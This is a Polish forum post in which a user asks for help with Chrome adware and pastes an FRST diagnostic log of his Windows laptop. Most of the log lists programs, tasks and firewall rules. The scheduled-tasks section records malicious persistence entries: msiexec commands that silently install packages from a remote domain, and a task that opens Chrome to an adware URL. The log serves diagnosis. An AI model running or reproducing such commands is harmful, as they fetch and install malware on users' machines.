Addition.txt

Jak usunąć z Chrome wyskakujące reklamy? Logi z FRST.

Hej, mam problem z laptopem. Zazwyczaj radziłem sobie sam ale teraz już brak mi pomysłów. Komputer sam otwiera karty w chromie z reklamami, sam wciska wstecz w przeglądarce. W załączeniu log skanu z FRST.

Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x64) Wersja: 14.11.2018
Uruchomiony przez CmK (15-11-2018 09:23:53)
Uruchomiony z C:\Users\CmK\Downloads
Windows 10 Home Wersja 1803 17134.407 (X64) (2018-05-22 10:43:44)
Tryb startu: Normal
==========================================================


==================== Konta użytkowników: =============================

Administrator (S-1-5-21-3463180217-101845397-200721854-500 - Administrator - Disabled)
CmK (S-1-5-21-3463180217-101845397-200721854-1001 - Administrator - Enabled) = & gt; C:\Users\CmK
Gość (S-1-5-21-3463180217-101845397-200721854-501 - Limited - Disabled)
Konto domyślne (S-1-5-21-3463180217-101845397-200721854-503 - Limited - Disabled)
WDAGUtilityAccount (S-1-5-21-3463180217-101845397-200721854-504 - Limited - Disabled)

==================== Centrum zabezpieczeń ========================

(Załączenie wejścia w fixlist spowoduje jego usunięcie.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: ESET Security (Enabled - Up to date) {EC1D6F37-E411-475A-DF50-12FF7FE4AC70}
AS: ESET Security (Enabled - Up to date) {577C8ED3-C22B-48D4-E5E0-298D0463E6CD}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Zainstalowane programy ======================

(W fixlist dozwolone tylko załączanie programów adware z flagą " Hidden " w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.)

µTorrent (HKU\S-1-5-21-3463180217-101845397-200721854-1001\...\uTorrent) (Version: 3.5.4.44632 - BitTorrent Inc.)
Adobe Acrobat Reader DC - Polish (HKLM-x32\...\{AC76BA86-7AD7-1045-7B44-AC0F074E4100}) (Version: 19.008.20080 - Adobe Systems Incorporated)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 4.5.0.331 - Adobe Systems Incorporated)
Adobe Flash Player 25 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 25.0.0.171 - Adobe Systems Incorporated)
Adobe Photoshop CC 2018 (HKLM-x32\...\PHSP_19_1_4) (Version: 19.1.4 - Adobe Systems Incorporated)
Advanced IP Scanner 2.5 (HKLM-x32\...\{AA4334DF-8497-4F57-92B4-CB3AD242FAA7}) (Version: 2.5.3646 - Famatech)
Aktualizacja biblioteki Samsung (HKLM-x32\...\PRO100_is1) (Version: - Ecru Oprogramowanie)
AMD Catalyst Install Manager (HKLM\...\{5AF0B1A8-1EF7-0FF7-5504-4983FB76F914}) (Version: 3.0.847.0 - Advanced Micro Devices, Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Asystent Firma 2010 (v10.11.17) (HKLM-x32\...\Asystent Firma 2010_is1) (Version: - Meteoryt.pl)
Dell System Detect (HKU\S-1-5-21-3463180217-101845397-200721854-1001\...\d24084d039586cae) (Version: 8.4.0.5 - Dell)
Dell Touchpad (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: 8.1200.101.218 - ALPS ELECTRIC CO., LTD.)
ESET Security (HKLM\...\{30AAEA0C-2993-4ED6-8ABC-48499DA53D87}) (Version: 12.0.27.0 - ESET, spol. s r.o.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 70.0.3538.102 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.17 - Google Inc.) Hidden
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 7.0.0.1118 - Intel Corporation)
Java 8 Update 112 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180112F0}) (Version: 8.0.1120.15 - Oracle Corporation)
Macro Recorder 5.8.0 (HKLM-x32\...\Macro Recorder_is1) (Version: 5.8.0 - Jitbit Software)
Microsoft Office Standard 2016 (HKLM\...\Office16.STANDARD) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3463180217-101845397-200721854-1001\...\OneDriveSetup.exe) (Version: 18.172.0826.0010 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23918 (HKLM-x32\...\{dab68466-3a7d-41a8-a5cf-415e3ff8ef71}) (Version: 14.0.23918.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23918 (HKLM-x32\...\{2e085fd2-a3e4-4b39-8e10-6b8d35f55244}) (Version: 14.0.23918.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.12.25810 (HKLM-x32\...\{e2ee15e2-a480-4bc5-bfb7-e9803d1d9823}) (Version: 14.12.25810.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.12.25810 (HKLM-x32\...\{56e11d69-7cc9-40a5-a4f9-8f6190c4d84d}) (Version: 14.12.25810.0 - Microsoft Corporation)
MiniTool Partition Wizard Free 10.2.1 (HKLM\...\{05D996FA-ADCB-4D23-BA3C-A7C184A8FAC6}_is1) (Version: - MiniTool Solution Ltd.)
Mozilla Firefox 63.0 (x64 en-US) (HKLM\...\Mozilla Firefox 63.0 (x64 en-US)) (Version: 63.0 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 60.0.2 - Mozilla)
Mozilla Thunderbird 60.3.0 (x86 pl) (HKLM-x32\...\Mozilla Thunderbird 60.3.0 (x86 pl)) (Version: 60.3.0 - Mozilla)
Narzędzia sprawdzające pakietu Microsoft Office 2016 — polski (HKLM\...\{90160000-001F-0415-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Native Instruments Traktor 2 (HKLM-x32\...\Native Instruments Traktor 2) (Version: - Native Instruments)
Notepad++ (32-bit x86) (HKLM-x32\...\Notepad++) (Version: 7.5.6 - Notepad++ Team)
Obsługa programów Apple (HKLM-x32\...\{46F044A5-CE8B-4196-984E-5BD6525E361D}) (Version: 2.3.6 - Apple Inc.)
OpenBoard (HKLM-x32\...\{8CCA6AC7-BBF9-4DD2-8E70-A907E0FCA38F}}_is1) (Version: - Open Education Foundation)
Opera Stable 56.0.3051.99 (HKLM-x32\...\Opera 56.0.3051.99) (Version: 56.0.3051.99 - Opera Software)
Oracle VM VirtualBox 5.2.12 (HKLM\...\{128AD467-F107-4FED-A283-F355E74DE103}) (Version: 5.2.12 - Oracle Corporation)
PRO100 aktualizacja Siemens (HKLM-x32\...\PRO100 wersja 5_is1) (Version: - Ecru Oprogramowanie)
QuickTime 7 (HKLM-x32\...\{111EE7DF-FC45-40C7-98A7-753AC46B12FB}) (Version: 7.75.80.95 - Apple Inc.)
Serato DJ Pro (HKLM\...\{EE6AA460-D9D7-42E7-B023-0BAA4F39AE1C}) (Version: 2.0.5.4558 - Serato Limited) Hidden
Serato DJ Pro (HKLM-x32\...\{53f1d26e-1c1e-47a6-a4af-953eca8c66d7}) (Version: 2.0.5.4558 - Serato Limited)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
TeamViewer 13 (HKLM-x32\...\TeamViewer) (Version: 13.2.14327 - TeamViewer)
TI USB 3.0 Host Controller Driver (HKLM-x32\...\InstallShield_{B1EB7FFF-6E44-43D8-869D-B78E44CD3E0F}) (Version: 1.12.14.0 - Texas Instruments Inc.)
TI USB3 Host Driver (HKLM-x32\...\{B1EB7FFF-6E44-43D8-869D-B78E44CD3E0F}) (Version: 1.12.14.0 - Texas Instruments Inc.) Hidden
Tibia (HKU\S-1-5-21-3463180217-101845397-200721854-1001\...\Tibia) (Version: - CipSoft GmbH)
Total Commander 64-bit (Remove or Repair) (HKLM\...\Totalcmd64) (Version: 9.20 beta 3 - Ghisler Software GmbH)
Ubiquiti UniFi (remove only) (HKLM-x32\...\Ubiquiti UniFi) (Version: - )
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{EC5A6438-850E-4AD1-9169-DD071C8EFFEF}) (Version: 2.10.0.0 - Microsoft Corporation)
Validity Sensors DDK (HKLM\...\{56BAC4EE-B1DA-42A7-ACA5-7A353F2ED1DA}) (Version: 4.3.108.0 - Validity Sensors, Inc.)
VEGAS Pro 15.0 (HKLM\...\{E0F91FB0-7FC4-11E7-B8E9-95BE57594EAC}) (Version: 15.0.177 - VEGAS)
WinRAR 5.40 (64-bitowy) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)
World of Tanks (HKU\S-1-5-21-3463180217-101845397-200721854-1001\...\{1EAC1D02-C6AC-4FA6-9A44-96258C37C812eu}_is1) (Version: - Wargaming.net)

==================== Niestandardowe rejestracje CLSID (filtrowane): ==========================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

CustomCLSID: HKU\S-1-5-21-3463180217-101845397-200721854-1001_Classes\CLSID\{0E270DAA-1BE6-48F2-AC49-D2A3B22E1F6A}\InprocServer32 - & gt; %%systemroot%%\system32\shell32.dll = & gt; Brak pliku
CustomCLSID: HKU\S-1-5-21-3463180217-101845397-200721854-1001_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 - & gt; C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)
ShellIconOverlayIdentifiers: [ AccExtIco1] - & gt; {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} = & gt; C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2018-02-10] ()
ShellIconOverlayIdentifiers: [ AccExtIco2] - & gt; {853B7E05-C47D-4985-909A-D0DC5C6D7303} = & gt; C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2018-02-10] ()
ShellIconOverlayIdentifiers: [ AccExtIco3] - & gt; {42D38F2E-98E9-4382-B546-E24E4D6D04BB} = & gt; C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2018-02-10] ()
ContextMenuHandlers1: [AccExt] - & gt; {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} = & gt; C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2018-02-10] ()
ContextMenuHandlers1: [ANotepad++64] - & gt; {B298D29A-A6ED-11DE-BA8C-A68E55D89593} = & gt; C:\Program Files (x86)\Notepad++\NppShell_06.dll [2018-03-19] ()
ContextMenuHandlers1: [ESET Security Shell] - & gt; {B089FE88-FB52-11D3-BDF1-0050DA34150D} = & gt; C:\Program Files\ESET\ESET Security\shellExt.dll [2018-10-12] (ESET)
ContextMenuHandlers1: [WinRAR] - & gt; {B41DB860-64E4-11D2-9906-E49FADC173CA} = & gt; C:\Program Files\WinRAR\rarext.dll [2016-09-19] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] - & gt; {B41DB860-8EE4-11D2-9906-E49FADC173CA} = & gt; C:\Program Files\WinRAR\rarext32.dll [2016-09-19] (Alexander Roshal)
ContextMenuHandlers2: [ESET Security Shell] - & gt; {B089FE88-FB52-11D3-BDF1-0050DA34150D} = & gt; C:\Program Files\ESET\ESET Security\shellExt.dll [2018-10-12] (ESET)
ContextMenuHandlers5: [igfxcui] - & gt; {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} = & gt; C:\WINDOWS\system32\igfxpph.dll [2017-03-09] (Intel Corporation)
ContextMenuHandlers6: [AccExt] - & gt; {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} = & gt; C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2018-02-10] ()
ContextMenuHandlers6: [ESET Security Shell] - & gt; {B089FE88-FB52-11D3-BDF1-0050DA34150D} = & gt; C:\Program Files\ESET\ESET Security\shellExt.dll [2018-10-12] (ESET)
ContextMenuHandlers6: [WinRAR] - & gt; {B41DB860-64E4-11D2-9906-E49FADC173CA} = & gt; C:\Program Files\WinRAR\rarext.dll [2016-09-19] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] - & gt; {B41DB860-8EE4-11D2-9906-E49FADC173CA} = & gt; C:\Program Files\WinRAR\rarext32.dll [2016-09-19] (Alexander Roshal)

==================== Zaplanowane zadania (filtrowane) =============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

Task: {02E20DBA-8495-42BC-B484-B17CF7024D3E} - System32\Tasks\Opera scheduled Autoupdate 1525760339 = & gt; C:\Program Files\Opera\launcher.exe [2018-11-06] (Opera Software)
Task: {3D47D870-F207-452B-AE70-DD3F975B6202} - System32\Tasks\{CEB3C62A-1734-4F8A-8C6E-DCD6A5CCE707} = & gt; C:\Windows\system32\pcalua.exe -a D:\R292194.exe -d D:\
Task: {44BDA632-E2A8-4C11-8FD3-E6689488F9A5} - System32\Tasks\{B57FF6FD-BFBA-814F-621B-667E200F45CB} = & gt; " msiexec " /package hxxp://inthemel.info/0kxunx8mfvmy.ygr -q
Task: {50CFCA3F-5302-4299-A5F2-8C45811DA69F} - System32\Tasks\GoogleUpdateTaskMachineUA = & gt; C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-05-19] (Google Inc.)
Task: {659553B7-248D-4070-8CE7-080F7789E7B9} - System32\Tasks\{CB237794-0AD8-45A8-A4F2-862338273105} = & gt; C:\Windows\system32\pcalua.exe -a C:\Users\CmK\Downloads\R294095.exe -d C:\Users\CmK\Downloads
Task: {65B85F6F-35B3-4459-A179-28255D5B7B25} - System32\Tasks\Microsoft\Windows\HelloFace\FODCleanupTask = & gt; C:\WINDOWS\System32\WinBioPlugIns\FaceFodUninstaller.exe [2018-04-12] ()
Task: {68633843-9F7A-4696-B505-6722EC82F588} - \Microsoft\Windows\UNP\RunCampaignManager - & gt; Brak pliku & lt; ==== UWAGA
Task: {687898E9-7D22-4516-AE9C-7E3D72308D01} - System32\Tasks\AdobeGCInvoker-1.0-DESKTOP-RV503L6-CmK = & gt; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [2018-09-10] (Adobe Systems, Incorporated)
Task: {86C2A077-58E2-404D-AAEB-852CA244A7E0} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 = & gt; C:\Program Files\Microsoft Office\Office16\msoia.exe [2015-07-31] (Microsoft Corporation)
Task: {9B70C8F0-DC17-4D33-B590-96975D26C086} - System32\Tasks\{6956B723-5277-015F-A929-8241CD618091} = & gt; " C:\Program Files (x86)\Google\Chrome\Application\chrome.exe " hxxp://mynewsfor.net/cl/?guid=s7yznrlwwvfk99sn6gekkfmp3g4ehji0 & prid=1 & pid=4_1324_0
Task: {B6A0AEC3-68AD-4A06-ABF5-8B0CD8D91585} - System32\Tasks\GoogleUpdateTaskMachineCore = & gt; C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-05-19] (Google Inc.)
Task: {C057DBEF-FCBC-479A-85CE-332345F61A6C} - System32\Tasks\{58D9AFD3-FB5A-3504-4F21-AD13617B5882} = & gt; " msiexec.exe " -q -i hxxp://inthemel.info/ktzsckpqmbod.maq
Task: {C233FE51-C246-4731-9A3B-FD9240FEB270} - System32\Tasks\AdobeAAMUpdater-1.0-DESKTOP-RV503L6-CmK = & gt; C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2018-04-10] (Adobe Systems Incorporated)
Task: {DCF98B72-F6B2-4EB6-A28F-C49FAB70A087} - System32\Tasks\{E346EA17-D289-4158-A2B1-A8A87BE95811} = & gt; C:\Windows\system32\pcalua.exe -a D:\R292473.exe -d D:\
Task: {E836AD2B-2296-4318-90FC-542E8A7BA3FC} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat = & gt; C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe [2015-07-31] (Microsoft Corporation)
Task: {F1DD8F1A-3C7F-4C88-88DB-EB397DF6F6D3} - System32\Tasks\{76CDA452-C252-4411-917A-C66A50CA4B22} = & gt; C:\Windows\system32\pcalua.exe -a D:\R292253.exe -d D:\
Task: {F600179A-1702-4D44-ABDA-610DCDA5669C} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 = & gt; C:\Program Files\Microsoft Office\Office16\msoia.exe [2015-07-31] (Microsoft Corporation)
Task: {F802895C-C3FF-401E-ACD0-91F7DD4BBE4A} - System32\Tasks\Adobe Acrobat Update Task = & gt; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2018-08-13] (Adobe Systems Incorporated)

(Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.)

Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job = & gt; C:\WINDOWS\explorer.exe

==================== Skróty & WMI ========================

(Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.)


==================== Załadowane moduły (filtrowane) ==============

2017-08-13 16:37 - 2012-09-18 14:27 - 000065024 _____ () C:\WINDOWS\system32\spool\PRTPROCS\x64\pphp1020.dll
2018-04-12 00:34 - 2018-04-12 00:34 - 000491744 _____ () C:\Windows\System32\InputHost.dll
2018-02-10 00:12 - 2018-02-10 00:12 - 000614856 _____ () C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll
2018-04-12 00:34 - 2018-04-12 00:34 - 000472064 _____ () C:\Windows\ShellExperiences\TileControl.dll
2018-04-12 00:34 - 2018-04-12 00:34 - 002759168 _____ () C:\Windows\ShellComponents\TaskFlowUI.dll
2018-11-14 08:17 - 2018-11-01 07:55 - 002185216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2018-10-16 14:19 - 2018-10-16 14:20 - 000009216 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.34.81.0_x64__kzf8qxf38zg5c\ImagePipelineNative.dll
2018-11-13 07:01 - 2018-11-13 07:01 - 000060416 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.34.81.0_x64__kzf8qxf38zg5c\ChakraBridge.dll
2018-11-13 07:01 - 2018-11-13 07:01 - 000183808 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.34.81.0_x64__kzf8qxf38zg5c\SkypeBackgroundHost.exe
2018-11-14 08:05 - 2018-11-08 23:14 - 005020504 _____ () C:\Program Files (x86)\Google\Chrome\Application\70.0.3538.102\libglesv2.dll
2018-11-14 08:05 - 2018-11-08 23:14 - 000116056 _____ () C:\Program Files (x86)\Google\Chrome\Application\70.0.3538.102\libegl.dll
2018-10-16 14:20 - 2018-10-16 14:20 - 004183040 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\Calculator.exe
2018-09-26 11:29 - 2018-09-26 11:29 - 004472952 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\Microsoft.UI.Xaml.dll
2018-07-27 13:31 - 2010-10-07 20:37 - 000546205 _____ () C:\Program Files (x86)\Meteoryt2010\AsystentFirma\plugins\sqlite3.dll
2018-07-27 13:31 - 2009-07-27 07:27 - 000600064 _____ () C:\Program Files (x86)\Meteoryt2010\AsystentFirma\plugins\PlgMusicPlayer.dll

==================== Alternate Data Streams (filtrowane) =========

(Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.)


==================== Tryb awaryjny (filtrowane) ===================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość " AlternateShell " zostanie przywrócona.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService = & gt; " " = " Service "
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys = & gt; " " = " Driver "
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService = & gt; " " = " Service "
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys = & gt; " " = " Driver "

==================== Powiązania plików (filtrowane) ===============

(Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.)


==================== Internet Explorer - Witryny zaufane i z ograniczeniami ===============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.)


==================== Hosts - zawartość: ===============================

(Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.)

2015-10-30 08:24 - 2015-10-30 08:21 - 000000824 _____ C:\WINDOWS\system32\Drivers\etc\hosts


==================== Inne obszary ============================

(Obecnie brak automatycznej naprawy dla tej sekcji.)

HKU\S-1-5-21-3463180217-101845397-200721854-1001\Control Panel\Desktop\\Wallpaper - & gt; C:\Users\CmK\Desktop\Tuning-BMW-E30.png
DNS Servers: 192.168.123.1 - 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System = & gt; (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer = & gt; (SmartScreenEnabled: RequireAdmin)
Zapora systemu Windows [funkcja włączona]

==================== MSCONFIG/TASK MANAGER - Wyłączone elementy ==

Załączenie wejścia w fixlist spowoduje jego usunięcie.

HKLM\...\StartupApproved\Run: = & gt; " IgfxTray "
HKLM\...\StartupApproved\Run: = & gt; " HotKeysCmds "
HKLM\...\StartupApproved\Run: = & gt; " Persistence "
HKLM\...\StartupApproved\Run: = & gt; " AdobeGCInvoker-1.0 "
HKLM\...\StartupApproved\Run: = & gt; " AdobeAAMUpdater-1.0 "
HKLM\...\StartupApproved\Run32: = & gt; " Adobe Creative Cloud "
HKLM\...\StartupApproved\Run32: = & gt; " SunJavaUpdateSched "
HKLM\...\StartupApproved\Run32: = & gt; " APSDaemon "
HKU\S-1-5-21-3463180217-101845397-200721854-1001\...\StartupApproved\Run: = & gt; " OneDrive "
HKU\S-1-5-21-3463180217-101845397-200721854-1001\...\StartupApproved\Run: = & gt; " World of Tanks "
HKU\S-1-5-21-3463180217-101845397-200721854-1001\...\StartupApproved\Run: = & gt; " HSShareV6 "
HKU\S-1-5-21-3463180217-101845397-200721854-1001\...\StartupApproved\Run: = & gt; " uTorrent "

==================== Reguły Zapory systemu Windows (filtrowane) ===============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

FirewallRules: [{42BEDB9B-1003-4D10-B794-847949132966}] = & gt; (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{3430AFAD-B621-4505-9955-0E102FC21348}] = & gt; (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{4EF7FF92-DA76-4880-8112-E1CF6AC9CF7E}] = & gt; (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{BC1A80D7-E8BD-4846-829C-5C4F12FE6540}] = & gt; (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{4D110AF4-3D97-4218-852C-0562119E238B}] = & gt; (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{5CBF876A-946D-4B10-9AA9-254ACAF8F8EE}] = & gt; (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{5A724943-C903-4581-AF82-EBC5A8B46419}] = & gt; (Allow) C:\Games\World_of_Tanks\worldoftanks.exe
FirewallRules: [{14969BF7-EF0F-4696-ABCB-2D757C7E8674}] = & gt; (Allow) C:\Games\World_of_Tanks\worldoftanks.exe
FirewallRules: [{97EABF13-A9FC-4A49-A30F-6BF6E2A8D96C}] = & gt; (Allow) C:\Games\World_of_Tanks\WoTLauncher.exe
FirewallRules: [{FB193DEE-DD12-4201-925F-886DE727F907}] = & gt; (Allow) C:\Games\World_of_Tanks\WoTLauncher.exe
FirewallRules: [{EC27C298-1B61-497B-A151-3103728BEDE2}] = & gt; (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{DCE725FA-0E39-41D1-BBCE-81DA384A7BD6}] = & gt; (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [TCP Query User{B41A69DF-DA09-4E7F-94BF-995266F769F2}C:\totalcmd\totalcmd64.exe] = & gt; (Allow) C:\totalcmd\totalcmd64.exe
FirewallRules: [UDP Query User{5378CEA1-912E-4CC3-A917-D48EB06325DC}C:\totalcmd\totalcmd64.exe] = & gt; (Allow) C:\totalcmd\totalcmd64.exe
FirewallRules: [TCP Query User{82B90C16-8BA5-43DF-BF5C-074B8C306725}C:\users\cmk\downloads\utorrentportable\app\utorrent\utorrent.exe] = & gt; (Allow) C:\users\cmk\downloads\utorrentportable\app\utorrent\utorrent.exe
FirewallRules: [UDP Query User{407A72E7-4216-4AC0-BE0B-F70F3BD707E1}C:\users\cmk\downloads\utorrentportable\app\utorrent\utorrent.exe] = & gt; (Allow) C:\users\cmk\downloads\utorrentportable\app\utorrent\utorrent.exe
FirewallRules: [{D31F9F61-140D-40D7-B056-018CB4218B8B}] = & gt; (Allow) C:\Program Files\Mozilla Firefox\firefox.exe
FirewallRules: [{979949F6-BDC1-4CB5-95B3-4FC692E8B388}] = & gt; (Allow) C:\Program Files\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{665E88D6-36B1-4AF7-87E3-9870058FB530}C:\users\cmk\downloads\babo violent 2 prozac 2.1.3\babo violent 2 prozac 2.1.3\babo violent 2 prozac 2.1.3\bv2p.exe] = & gt; (Allow) C:\users\cmk\downloads\babo violent 2 prozac 2.1.3\babo violent 2 prozac 2.1.3\babo violent 2 prozac 2.1.3\bv2p.exe
FirewallRules: [UDP Query User{C3F0695F-216B-4777-8FE2-C9C6D0451996}C:\users\cmk\downloads\babo violent 2 prozac 2.1.3\babo violent 2 prozac 2.1.3\babo violent 2 prozac 2.1.3\bv2p.exe] = & gt; (Allow) C:\users\cmk\downloads\babo violent 2 prozac 2.1.3\babo violent 2 prozac 2.1.3\babo violent 2 prozac 2.1.3\bv2p.exe
FirewallRules: [{31F8D3A2-BC88-4009-B93D-EE11211124E4}] = & gt; (Allow) C:\Program Files\Java\jre1.8.0_112\bin\java.exe
FirewallRules: [{07C990B3-5194-442E-BD53-07250AFC47BA}] = & gt; (Allow) C:\Program Files\Java\jre1.8.0_112\bin\java.exe
FirewallRules: [{4F923C1B-8D8D-4E86-B53E-2B99ACB1D316}] = & gt; (Allow) C:\Users\CmK\Ubiquiti UniFi\bin\mongod.exe
FirewallRules: [{35B382C7-AFD3-4A79-9B7D-3AED2A75ABCB}] = & gt; (Allow) C:\Users\CmK\Ubiquiti UniFi\bin\mongod.exe
FirewallRules: [TCP Query User{04A4981A-4FAE-438E-BCA4-A24B7AA6CF76}C:\programdata\oracle\java\javapath_target_529225828\javaw.exe] = & gt; (Allow) C:\programdata\oracle\java\javapath_target_529225828\javaw.exe
FirewallRules: [UDP Query User{E1471D6A-C96B-40B2-85B9-5120F0E292D9}C:\programdata\oracle\java\javapath_target_529225828\javaw.exe] = & gt; (Allow) C:\programdata\oracle\java\javapath_target_529225828\javaw.exe
